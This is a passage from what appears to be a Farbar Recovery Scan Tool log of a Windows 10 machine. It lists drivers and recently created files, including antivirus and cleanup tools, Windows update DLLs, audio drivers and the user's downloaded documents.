    S3 SmbDrv; C:\WINDOWS\System32\drivers\Smb_driver_AMDASF.sys [58984 2016-02-22] (Synaptics Incorporated)
    R3 SmbDrvI; C:\WINDOWS\system32\DRIVERS\Smb_driver_Intel.sys [72824 2016-08-19] (Synaptics Incorporated)
    R0 trufos; C:\WINDOWS\System32\DRIVERS\trufos.sys [520032 2016-06-22] (BitDefender S.R.L.)
    S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [44056 2016-07-16] (Microsoft Corporation)
    S3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [290144 2016-07-16] (Microsoft Corporation)
    S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [123232 2016-07-16] (Microsoft Corporation)
    R3 WirelessButtonDriver64; C:\WINDOWS\system32\DRIVERS\WirelessButtonDriver64.sys [31656 2016-04-14] (HP)
    U0 aswVmm; no ImagePath
     
    ==================== NetSvcs (Whitelisted) ===================
     
    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
     
     
    ==================== One Month Created files and folders ========
     
    (If an entry is included in the fixlist, the file/folder will be moved.)
     
    2017-02-01 17:45 - 2017-02-01 17:47 - 00023659 _____ C:\Users\Joseph\Downloads\FRST.txt
    2017-02-01 17:45 - 2017-02-01 17:45 - 00000000 ____D C:\FRST
    2017-02-01 17:43 - 2017-02-01 17:45 - 02420736 _____ (Farbar) C:\Users\Joseph\Downloads\FRST64.exe
    2017-02-01 17:20 - 2017-02-01 17:27 - 00000556 _____ C:\Users\Joseph\Desktop\JRT.txt
    2017-02-01 17:07 - 2017-02-01 17:08 - 00000789 _____ C:\bdlog.txt
    2017-02-01 17:02 - 2017-02-01 17:29 - 00000000 ____D C:\AdwCleaner
    2017-02-01 16:58 - 2017-02-01 17:15 - 01663040 _____ (Malwarebytes) C:\Users\Joseph\Downloads\JRT (1).exe
    2017-02-01 16:56 - 2017-02-01 16:58 - 01663040 _____ (Malwarebytes) C:\Users\Joseph\Downloads\JRT.exe
    2017-02-01 16:54 - 2017-02-01 17:01 - 03988944 _____ C:\Users\Joseph\Downloads\AdwCleaner.exe
    2017-02-01 16:52 - 2017-02-01 16:52 - 00040137 _____ C:\ProgramData\dm.1485985887.bdinstall.bin
    2017-02-01 09:33 - 2017-02-01 09:33 - 00000385 _____ C:\WINDOWS\system32\user_gensett.xml
    2017-02-01 08:54 - 2017-02-01 08:54 - 00000000 ____D C:\Users\Joseph\AppData\Temp
    2017-02-01 08:52 - 2017-02-01 08:52 - 00056949 _____ C:\ProgramData\dm.1485956857.bdinstall.bin
    2017-02-01 08:51 - 2017-02-01 08:51 - 00000000 ____D C:\ProgramData\Bitdefender Device Management
    2017-02-01 08:47 - 2017-02-01 08:47 - 00403991 _____ C:\ProgramData\cl.1485956260.bdinstall.bin
    2017-02-01 08:47 - 2017-02-01 08:47 - 00003404 _____ C:\WINDOWS\System32\Tasks\Bitdefender AgentTask_AD394AE64E874073B10A89FEEC305A3C
    2017-02-01 08:45 - 2017-02-01 08:45 - 00002310 _____ C:\Users\Public\Desktop\Bitdefender 2017.lnk
    2017-02-01 08:45 - 2017-02-01 08:45 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Bitdefender 2017
    2017-02-01 08:45 - 2017-02-01 08:45 - 00000000 ____D C:\ProgramData\BDLogging
    2017-02-01 08:44 - 2016-09-20 04:17 - 01605376 _____ (BitDefender) C:\WINDOWS\system32\Drivers\avc3.sys
    2017-02-01 08:44 - 2016-09-20 04:16 - 00878072 _____ (BitDefender) C:\WINDOWS\system32\Drivers\avckf.sys
    2017-02-01 08:44 - 2016-03-14 22:04 - 00023672 _____ (Bitdefender) C:\WINDOWS\system32\Drivers\bdelam.sys
    2017-02-01 08:44 - 2015-12-04 19:27 - 00087912 _____ (BitDefender) C:\WINDOWS\system32\Drivers\bdvedisk.sys
    2017-02-01 08:44 - 2007-04-11 11:11 - 00511328 _____ (Microsoft Corporation) C:\WINDOWS\capicom.dll
    2017-02-01 08:43 - 2017-02-01 08:51 - 00000000 ____D C:\Users\Joseph\AppData\Roaming\Bitdefender
    2017-02-01 08:43 - 2016-11-17 05:00 - 00309280 _____ (Bitdefender) C:\WINDOWS\system32\Drivers\ignis.sys
    2017-02-01 08:38 - 2017-02-01 08:47 - 00000000 ____D C:\ProgramData\Bitdefender
    2017-02-01 08:38 - 2017-02-01 08:47 - 00000000 ____D C:\Program Files\Bitdefender
    2017-02-01 08:38 - 2016-10-29 08:54 - 00182944 _____ (BitDefender LLC) C:\WINDOWS\system32\Drivers\gzflt.sys
    2017-02-01 08:38 - 2016-06-22 14:40 - 00520032 _____ (BitDefender S.R.L.) C:\WINDOWS\system32\Drivers\trufos.sys
    2017-02-01 08:37 - 2017-02-01 08:38 - 00000000 ____D C:\Program Files\Common Files\Bitdefender
    2017-02-01 08:37 - 2017-02-01 08:37 - 00000000 ____D C:\Users\Joseph\AppData\Roaming\QuickScan
    2017-02-01 08:29 - 2017-02-01 08:29 - 00003794 _____ C:\WINDOWS\System32\Tasks\Bitdefender Agent WatchDog_65D6944A0EF74FDAB96E31112AD39864
    2017-02-01 08:27 - 2017-02-01 17:38 - 00000000 ____D C:\Program Files\Bitdefender Agent
    2017-02-01 08:27 - 2017-02-01 08:27 - 00047353 _____ C:\ProgramData\agent.1485955633.bdinstall.bin
    2017-02-01 08:27 - 2017-02-01 08:27 - 00000000 ____D C:\ProgramData\Bitdefender Agent
    2017-02-01 08:26 - 2017-02-01 08:27 - 11842648 _____ C:\Users\Joseph\Downloads\bitdefender_windows_43ea11d5-575e-4d5e-84a9-5683192df898.exe
    2017-01-31 23:27 - 2017-01-31 23:27 - 00000017 _____ C:\Users\Joseph\AppData\Local\resmon.resmoncfg
    2017-01-31 23:13 - 2017-01-31 23:13 - 00251848 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\132034FB.sys
    2017-01-31 15:37 - 2017-01-31 15:37 - 01923396 _____ C:\Users\Joseph\Downloads\hospital visit.pdf
    2017-01-30 20:58 - 2017-01-30 20:59 - 02059056 _____ (The Nielsen Company) C:\Users\Joseph\Downloads\ShopTracker_033D6D4A68A315B4A000 (2).exe
    2017-01-28 01:57 - 2017-01-28 01:57 - 00000000 ____D C:\WINDOWS\System32\Tasks\AVAST Software
    2017-01-28 01:57 - 2017-01-28 01:57 - 00000000 ____D C:\Program Files\Common Files\AV
    2017-01-25 00:02 - 2016-12-21 02:08 - 00142848 _____ (Microsoft Corporation) C:\WINDOWS\system32\poqexec.exe
    2017-01-25 00:02 - 2016-12-20 23:44 - 00120320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\poqexec.exe
    2017-01-24 23:47 - 2017-01-21 21:14 - 00485032 ____N (Microsoft Corporation) C:\WINDOWS\system32\MpSigStub.exe
    2017-01-24 17:47 - 2017-01-24 17:47 - 10697014 _____ C:\Users\Joseph\Downloads\FDN_Glyphosate_FoodTesting_Report_p2016.pdf
    2017-01-24 13:33 - 2017-01-24 13:33 - 00083650 _____ C:\Users\Joseph\Downloads\visit 1-23.pdf
    2017-01-21 13:55 - 2017-02-01 08:34 - 00000000 ____D C:\ProgramData\AVAST Software
    2017-01-21 13:55 - 2017-01-21 13:55 - 06253640 _____ (AVAST Software) C:\Users\Joseph\Downloads\avast_free_antivirus_setup_online_cnet_2.exe
    2017-01-20 13:28 - 2017-01-20 13:28 - 00000184 _____ C:\Users\Joseph\AppData\Roaming\6ov.vbs
    2017-01-19 21:09 - 2017-01-19 21:09 - 00151143 _____ C:\Users\Joseph\Downloads\PDF_Bill (2).pdf
    2017-01-19 21:09 - 2017-01-19 21:09 - 00150985 _____ C:\Users\Joseph\Downloads\PDF_Bill (3).pdf
    2017-01-19 21:08 - 2017-01-19 21:08 - 00199440 _____ C:\Users\Joseph\Downloads\PDF_Bill (1).pdf
    2017-01-19 21:06 - 2017-01-19 21:06 - 00001115 _____ C:\Users\Joseph\Downloads\AccountEnergyUsage.csv
    2017-01-19 20:26 - 2017-01-19 20:26 - 00223944 _____ C:\Users\Joseph\Downloads\djcxMjYtODA5MC04MDkxLTgzNjMtT0lCMS00MDRGQUFCQi0wLTIyMzk0NC00Nzk2ODE3LTIyMzk0NC04NS02OC0wLTE2OS0wLV4BUAExNzA5NgEyMzYxNAE0AUNCQwFDQkMwMQEyMDA0LTAwMDEBQUNDRVNTIE5BVElPTkFMIENPUlBPUkFUSU9OIFBST0ZJVCBTSEFSSU5HIFBMQU4BTkEBUk.pdf
    2017-01-19 14:36 - 2017-01-19 14:36 - 00000000 ____D C:\Users\Joseph\AppData\LocalLow\Temp
    2017-01-18 22:07 - 2017-01-18 22:07 - 00676419 _____ C:\Users\Joseph\Downloads\137230-201711873115438.pdf
    2017-01-15 18:00 - 2017-01-15 18:00 - 00151143 _____ C:\Users\Joseph\Downloads\PDF_Bill.pdf
    2017-01-15 16:33 - 2017-01-15 16:33 - 00086004 _____ C:\Users\Joseph\Downloads\DS82_Complete (1).pdf
    2017-01-15 16:15 - 2017-01-15 16:15 - 00683112 _____ C:\Users\Joseph\Downloads\taxReturn (1).tax2016
    2017-01-15 16:11 - 2017-01-15 16:24 - 01487502 _____ C:\Users\Joseph\Downloads\taxReturn.tax2016
    2017-01-15 15:50 - 2017-01-15 15:50 - 06281998 _____ C:\Users\Joseph\Downloads\C2 Artist Mini-Posters.pdf
    2017-01-15 15:44 - 2017-01-15 15:44 - 00002529 _____ C:\Users\Public\Desktop\TurboTax 2016.lnk
    2017-01-15 15:44 - 2017-01-15 15:44 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TurboTax 2016
    2017-01-15 15:29 - 2017-01-15 15:30 - 121060464 _____ C:\Users\Joseph\Downloads\turbotax_deluxe_2016_windows.exe
    2017-01-14 21:56 - 2017-01-14 21:56 - 00085948 _____ C:\Users\Joseph\Downloads\DS82_Complete.pdf
    2017-01-14 11:22 - 2017-01-14 11:22 - 00235450 _____ C:\Users\Joseph\Downloads\CAMP_CONNECTION_CARNIVAL_flier2106.pdf
    2017-01-13 15:55 - 2017-01-13 15:53 - 72520712 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RCoRes64.dat
    2017-01-13 15:55 - 2017-01-13 15:53 - 07704619 _____ C:\WINDOWS\system32\Drivers\RTAIODAT.DAT
    2017-01-13 15:55 - 2017-01-13 15:53 - 03204096 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtPgEx64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 03014144 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RTSnMg64.cpl
    2017-01-13 15:55 - 2017-01-13 15:53 - 02706856 _____ (DTS, Inc.) C:\WINDOWS\system32\sltech64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 02201088 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RCoInstII64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 01615656 _____ (Conexant Systems Inc.) C:\WINDOWS\system32\CX64APO.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 01529136 _____ (Conexant Systems Inc.) C:\WINDOWS\system32\CX64Proxy.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 01435136 _____ (Synopsys, Inc.) C:\WINDOWS\system32\SRRPTR64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 01360512 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RTCOM64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 01003320 _____ (Sound Research, Corp.) C:\WINDOWS\system32\SEHDHF64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00984912 _____ (DTS, Inc.) C:\WINDOWS\system32\sl3apo64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00865912 _____ (Sound Research, Corp.) C:\WINDOWS\SysWOW64\SEHDHF32.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00859216 _____ (Sound Research, Corp.) C:\WINDOWS\system32\SEHDRA64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00850400 _____ (Sound Research, Corp.) C:\WINDOWS\system32\SECOMN64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00721800 _____ (Sound Research, Corp.) C:\WINDOWS\SysWOW64\SECOMN32.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00689872 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtDataProc64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00574752 _____ (Andrea Electronics Corporation) C:\WINDOWS\system32\AERTAC64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00532376 _____ (SRS Labs, Inc.) C:\WINDOWS\system32\SRSTSX64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00499152 _____ (Sound Research, Corp.) C:\WINDOWS\system32\SEAPO64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00467152 _____ (Synopsys, Inc.) C:\WINDOWS\system32\SRAPO64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00438688 _____ (Conexant Systems, Inc.) C:\WINDOWS\system32\CAF64APO2.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00387312 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RTEEP64A.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00381400 _____ (Synopsys, Inc.) C:\WINDOWS\system32\SRCOM64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00343704 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtlCPAPI64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00341144 _____ (Synopsys, Inc.) C:\WINDOWS\SysWOW64\SRCOM.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00341144 _____ (Synopsys, Inc.) C:\WINDOWS\system32\SRCOM.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00321712 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RP3DHT64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00321712 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RP3DAA64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00258864 _____ (TODO: <Company name>) C:\WINDOWS\system32\slprp64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00214832 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RTEED64A.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00166200 _____ (SRS Labs, Inc.) C:\WINDOWS\system32\SRSWOW64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00122320 _____ (Real Sound Lab SIA) C:\WINDOWS\system32\CONEQMSAPOGUILibrary.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00118592 _____ (Andrea Electronics Corporation) C:\WINDOWS\system32\AERTAR64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00112488 _____ (Conexant Systems, Inc.) C:\WINDOWS\system32\Caf64api.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00110984 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RTEEL64A.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00088344 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RTEEG64A.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00005604 _____ C:\WINDOWS\system32\cxapo.lncs
    2017-01-13 15:55 - 2017-01-13 15:53 - 00000736 _____ C:\WINDOWS\system32\cxapo.prop
    2017-01-11 23:08 - 2017-01-11 23:08 - 02604526 _____ C:\Users\Joseph\Downloads\AAS-L2-Student-Packet-Sample.pdf
    2017-01-11 22:56 - 2017-01-11 22:56 - 02399782 _____ C:\Users\Joseph\Downloads\AAS-L1-Student-Packet-Sample.pdf
    2017-01-11 22:55 - 2017-01-11 22:55 - 05323693 _____ C:\Users\Joseph\Downloads\AAR-L1-2ndEd-CobwebtheCat-Sample.pdf
    2017-01-11 15:10 - 2017-01-11 15:10 - 05432492 _____ C:\Users\Joseph\Downloads\01-08-2017.pdf
    2017-01-11 15:07 - 2017-01-11 15:07 - 00106459 _____ C:\Users\Joseph\Downloads\bill_10912246.pdf
    2017-01-10 22:58 - 2016-12-21 00:09 - 00263472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Storage.ApplicationData.dll
    2017-01-10 22:58 - 2016-12-21 00:01 - 20969928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
    2017-01-10 22:58 - 2016-12-20 23:46 - 00034304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LaunchWinApp.exe
    2017-01-10 22:58 - 2016-12-20 23:43 - 00285184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.BlockedShutdown.dll
    2017-01-10 22:58 - 2016-12-20 23:41 - 00253952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.BioFeedback.dll
    2017-01-10 22:58 - 2016-12-20 23:40 - 00557568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\StoreAgent.dll
    2017-01-10 22:58 - 2016-12-20 23:40 - 00318976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rdpencom.dll
    2017-01-10 22:58 - 2016-12-20 23:40 - 00237056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SyncSettings.dll
    2017-01-10 22:58 - 2016-12-20 23:40 - 00180224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgent.exe
    2017-01-10 22:58 - 2016-12-20 23:39 - 00223232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgentUserBroker.exe
    2017-01-10 22:58 - 2016-12-20 23:38 - 00866816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Cred.dll
    2017-01-10 22:58 - 2016-12-20 23:34 - 07626752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
    2017-01-10 22:58 - 2016-12-20 23:30 - 05398016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aclui.dll
    2017-01-10 22:58 - 2016-12-20 23:30 - 01255936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AzureSettingSyncProvider.dll
    2017-01-10 22:58 - 2016-12-20 23:25 - 07469056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstscax.dll
    2017-01-10 22:58 - 2016-12-20 23:22 - 01883648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Logon.dll
    2017-01-10 22:58 - 2016-12-20 23:22 - 00860672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncCore.dll
    2017-01-10 22:58 - 2016-12-14 00:08 - 00341344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll
    2017-01-10 22:58 - 2016-12-14 00:06 - 00509792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncHost.exe
    2017-01-10 22:58 - 2016-12-14 00:01 - 01557808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winmde.dll
    2017-01-10 22:58 - 2016-12-13 23:45 - 00147968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32k.sys
    2017-01-10 22:58 - 2016-12-13 23:42 - 00167424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinSCard.dll
    2017-01-10 22:58 - 2016-12-13 23:36 - 00074752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\updatepolicy.dll
    2017-01-10 22:58 - 2016-12-13 23:35 - 00712192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll
    2017-01-10 22:58 - 2016-12-13 23:35 - 00553984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cryptui.dll
    2017-01-10 22:58 - 2016-12-13 23:22 - 02998272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys
    2017-01-10 22:58 - 2016-12-13 23:22 - 02748416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rdpcore.dll
    2017-01-10 22:57 - 2016-12-21 00:59 - 00218976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\offlinesam.dll
    2017-01-10 22:57 - 2016-12-21 00:02 - 03892864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfcore.dll
    2017-01-10 22:57 - 2016-12-21 00:02 - 01852720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmp4srcsnk.dll
    2017-01-10 22:57 - 2016-12-21 00:02 - 01360464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfnetsrc.dll
    2017-01-10 22:57 - 2016-12-21 00:02 - 01277344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfasfsrcsnk.dll
    2017-01-10 22:57 - 2016-12-21 00:02 - 01201872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmpeg2srcsnk.dll
    2017-01-10 22:57 - 2016-12-21 00:02 - 00980832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfnetcore.dll
    2017-01-10 22:57 - 2016-12-20 23:41 - 00231936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.LockScreen.dll
    2017-01-10 22:57 - 2016-12-20 23:39 - 01300480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVPXENC.dll
    2017-01-10 22:57 - 2016-12-20 23:35 - 04612608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.dll
    2017-01-10 22:57 - 2016-12-20 23:35 - 00198656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\indexeddbserver.dll
    2017-01-10 22:57 - 2016-12-20 23:33 - 19413504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
    2017-01-10 22:57 - 2016-12-20 23:32 - 19417600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
    2017-01-10 22:57 - 2016-12-20 23:27 - 00640000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MCRecvSrc.dll
    2017-01-10 22:57 - 2016-12-20 23:26 - 01155072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVP9DEC.dll
    2017-01-10 22:57 - 2016-12-20 23:25 - 06474752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mspaint.exe
    2017-01-10 22:57 - 2016-12-20 23:24 - 06044160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
    2017-01-10 22:57 - 2016-12-20 23:24 - 05061120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d2d1.dll
    2017-01-10 22:57 - 2016-12-20 23:24 - 03733504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_47.dll
    2017-01-10 22:57 - 2016-12-20 23:24 - 00886272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadtb.dll
    2017-01-10 22:57 - 2016-12-14 00:21 - 02206496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msmpeg2vdec.dll
    2017-01-10 22:57 - 2016-12-14 00:01 - 00382784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AUDIOKSE.dll
    2017-01-10 22:57 - 2016-12-14 00:01 - 00076984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\remoteaudioendpoint.dll
    2017-01-10 22:57 - 2016-12-13 23:46 - 01631232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Resources.dll
    2017-01-10 22:57 - 2016-12-13 23:40 - 00231424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudBackupSettings.dll
    2017-01-10 22:57 - 2016-12-13 23:40 - 00104448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.UI.Logon.ProxyStub.dll
    2017-01-10 22:57 - 2016-12-13 23:38 - 13869056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.dll
    2017-01-10 22:57 - 2016-12-13 23:38 - 00213504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.CredDialogController.dll
    2017-01-10 22:57 - 2016-12-13 23:35 - 00755712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
    2017-01-10 22:57 - 2016-12-13 23:32 - 00806400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3D12.dll
    2017-01-10 22:57 - 2016-12-13 23:32 - 00497152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LogonController.dll
    2017-01-10 22:57 - 2016-11-02 07:01 - 00484584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AudioSes.dll
    2017-01-10 22:57 - 2016-08-01 23:30 - 00822784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakradiag.dll
    2017-01-10 22:48 - 2016-12-21 02:49 - 00328008 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Storage.ApplicationData.dll
    2017-01-10 22:47 - 2016-12-21 03:08 - 00136032 _____ (Microsoft Corporation) C:\WINDOWS\system32\ImplatSetup.dll
    2017-01-10 22:47 - 2016-12-21 03:04 - 07816032 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
    2017-01-10 22:47 - 2016-12-21 02:43 - 04130440 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfcore.dll
    2017-01-10 22:47 - 2016-12-21 02:43 - 01454504 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfnetsrc.dll
    2017-01-10 22:47 - 2016-12-21 02:43 - 01071736 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfnetcore.dll
    2017-01-10 22:47 - 2016-12-21 02:43 - 00092512 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpudd.dll
    2017-01-10 22:47 - 2016-12-21 02:42 - 22224480 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
    2017-01-10 22:47 - 2016-12-21 02:42 - 01988560 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmp4srcsnk.dll
    2017-01-10 22:47 - 2016-12-21 02:42 - 01702392 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfasfsrcsnk.dll
    2017-01-10 22:47 - 2016-12-21 02:42 - 01300600 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmpeg2srcsnk.dll
    2017-01-10 22:47 - 2016-12-21 02:41 - 01600632 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppobjs.dll
    2017-01-10 22:47 - 2016-12-21 02:14 - 00043008 _____ (Microsoft Corporation) C:\WINDOWS\system32\LaunchWinApp.exe
    2017-01-10 22:47 - 2016-12-21 02:13 - 00119808 _____ (Microsoft Corporation) C:\WINDOWS\system32\KnobsCsp.dll
    2017-01-10 22:47 - 2016-12-21 02:12 - 00083968 _____ (Microsoft Corporation) C:\WINDOWS\system32\ProvPluginEng.dll
    2017-01-10 22:47 - 2016-12-21 02:10 - 00234496 _____ (Microsoft Corporation) C:\WINDOWS\system32\KnobsCore.dll
    2017-01-10 22:47 - 2016-12-21 02:09 - 00368640 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneBackupHandler.dll
    2017-01-10 22:47 - 2016-12-21 02:09 - 00363520 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.BioFeedback.dll
    2017-01-10 22:47 - 2016-12-21 02:08 - 01292288 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVPXENC.dll
    2017-01-10 22:47 - 2016-12-21 02:08 - 00418304 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.BlockedShutdown.dll
    2017-01-10 22:47 - 2016-12-21 02:08 - 00360448 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpencom.dll
    2017-01-10 22:47 - 2016-12-21 02:08 - 00349184 _____ (Microsoft Corporation) C:\WINDOWS\system32\provengine.dll
    2017-01-10 22:47 - 2016-12-21 02:08 - 00289792 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeveloperOptionsSettingsHandlers.dll
    2017-01-10 22:47 - 2016-12-21 02:08 - 00211968 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgent.exe
    2017-01-10 22:47 - 2016-12-21 02:07 - 00748544 _____ (Microsoft Corporation) C:\WINDOWS\system32\StoreAgent.dll
    2017-01-10 22:47 - 2016-12-21 02:06 - 06285312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.dll
    2017-01-10 22:47 - 2016-12-21 02:06 - 00310784 _____ (Microsoft Corporation) C:\WINDOWS\system32\SyncSettings.dll
    2017-01-10 22:47 - 2016-12-21 02:06 - 00260608 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgentUserBroker.exe
    2017-01-10 22:47 - 2016-12-21 02:06 - 00147456 _____ (Microsoft Corporation) C:\WINDOWS\system32\winsrv.dll
    2017-01-10 22:47 - 2016-12-21 02:05 - 00425984 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadcloudap.dll
    2017-01-10 22:47 - 2016-12-21 02:05 - 00049152 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Shell.dll
    2017-01-10 22:47 - 2016-12-21 02:01 - 09131008 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
    2017-01-10 22:47 - 2016-12-21 01:59 - 01908224 _____ (Microsoft Corporation) C:\WINDOWS\system32\AzureSettingSyncProvider.dll
    2017-01-10 22:47 - 2016-12-21 01:56 - 00947712 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVP9DEC.dll
